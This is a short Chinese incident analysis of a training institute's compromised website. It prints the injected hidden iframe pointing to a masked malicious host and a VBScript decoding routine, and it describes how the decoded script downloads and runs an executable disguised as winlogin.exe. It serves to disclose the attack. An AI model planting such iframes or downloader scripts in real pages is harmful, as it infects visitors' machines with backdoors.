某市职业经理人高级研修学院网站被植入传播Backdoor.Gpigeon.GEN的代码

简介: 某市职业经理人高级研修学院网站被植入传播Backdoor.Gpigeon.GEN的代码

网站页面被植入代码:

/---
<iframe src=hxxp://web**.5***9*cn.cn/n*a***p*ole*on/windows**/index.htm width=0 height=0></iframe>
---/
hxxp://web**.5***9*cn.cn/n*a***p*ole*on/windows**/index.htm(Kaspersky报为:Trojan-Downloader.VBS.Psyme.de)的内容为vbscript脚本,功能是利用自定义函数
/---
function UnEncode(temp)
but=67
for i = 1 to len(temp)
    if mid(temp,i,1)<> "琳" then
If Asc(Mid(temp, i, 1)) < 32 Or Asc(Mid(temp, i, 1)) > 126 Then
a = a & Chr(Asc(Mid(temp, i, 1)))
else
pk=asc(mid(temp,i,1))-but
            if pk>126 then
                    pk=pk-95
            elseif pk<32 then
                     pk=pk+95
             end if
             a=a&chr(pk)
end if
   else
             a=a&vbcrlf
   end if
next
UnEncode=a
end function
---/

解密并输出变量hu的值。

变量hu的值解密输出的是一段vbscript脚本,功能是利用 Microsoft.XMLhttp 和 scrīpting.FileSystemObject 下载文件 lsass.exe,保存为%temp%/winlogin.exe,然后通过 Shell.Application 对象 Q 的 ShellExecute 方法运行。


相关文章
|
4月前
|
安全 JavaScript 前端开发
某论坛新游试玩区被植入利用ANI漏洞传播 Trojan.Mnless.kip 的代码
某论坛新游试玩区被植入利用ANI漏洞传播 Trojan.Mnless.kip 的代码
|
8月前
|
运维 安全 测试技术
【答案】2023年国赛信息安全管理与评估正式赛答案-模块3 CTF
【答案】2023年国赛信息安全管理与评估正式赛答案-模块3 CTF
【答案】2023年国赛信息安全管理与评估正式赛答案-模块3 CTF
|
安全 Cloud Native Go
猫头虎博主赠书二期:《Go黑帽子 渗透测试编程之道(安全技术经典译丛) 》
猫头虎博主赠书二期:《Go黑帽子 渗透测试编程之道(安全技术经典译丛) 》
128 0
|
机器学习/深度学习 人工智能 算法
GAN 之父 Ian Goodfellow 从苹果离职:“拒绝”回办公室上班|灵活办公才是最好的政策
GAN 之父 Ian Goodfellow 从苹果离职:“拒绝”回办公室上班|灵活办公才是最好的政策
141 0
GAN 之父 Ian Goodfellow 从苹果离职:“拒绝”回办公室上班|灵活办公才是最好的政策
|
安全 测试技术 网络安全
|
Web App开发 JavaScript 安全
安全公司揭露in-session网络钓鱼新手法
  Trusteer在近日发表一份研究报告指出,过去黑客利用散布伪造的电子邮件来诱骗用户连接钓鱼网站的手法正在发生改变,新一代网络钓鱼可能利用浏览器漏洞,在网友造访合法网站的同时跳出一个伪造的视窗让使用者步入网络钓鱼的陷阱。
1017 0
|
安全 网络安全 数据安全/隐私保护
金融安全资讯精选 2017年第十一期 银行木马利用VMvare进行传播 研究人员发现新型安卓银行木马Red Alert
银行木马利用VMvare进行传播,研究人员发现新型安卓银行木马Red Alert,微软“10月周二补丁日”发布63个漏洞补丁,云栖大会安全发布汇总,高防降价90%,亚洲首个“芯片级”加密
2086 0